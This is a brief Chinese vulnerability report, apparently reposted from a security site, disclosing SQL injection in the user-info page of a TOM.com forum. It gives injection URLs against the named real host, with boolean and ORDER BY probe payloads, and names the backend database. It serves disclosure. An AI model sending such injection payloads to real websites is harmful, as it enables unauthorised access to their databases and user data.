在线社区论坛存在SQL注射 漏洞 ,情况严重,可获取主机以及 数据库 信息,望管理员速度修复,以免造成对主机安全威胁。 详细说明: http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' and '1'='1 http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' or '1'='2 http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' order by 1 --+- 可以进行二次注射测试。 漏洞证明:www.2cto.com http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' and '1'='1 http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' or '1'='2 http://club.she.tom.com/users/userinfo.php?username=qiaofeiyu' order by 1 --+- 可以进行二次注射测试。 VERSION: MYSQL 5.X DATABASE: bbsadmin 相关表: admin_usxxxxxxx 修复方案: 过滤一下吧 作者 孤狐浪子
查看更多关于TOM在线论区严重SQL注射漏洞可获取数据库信息的详细内容...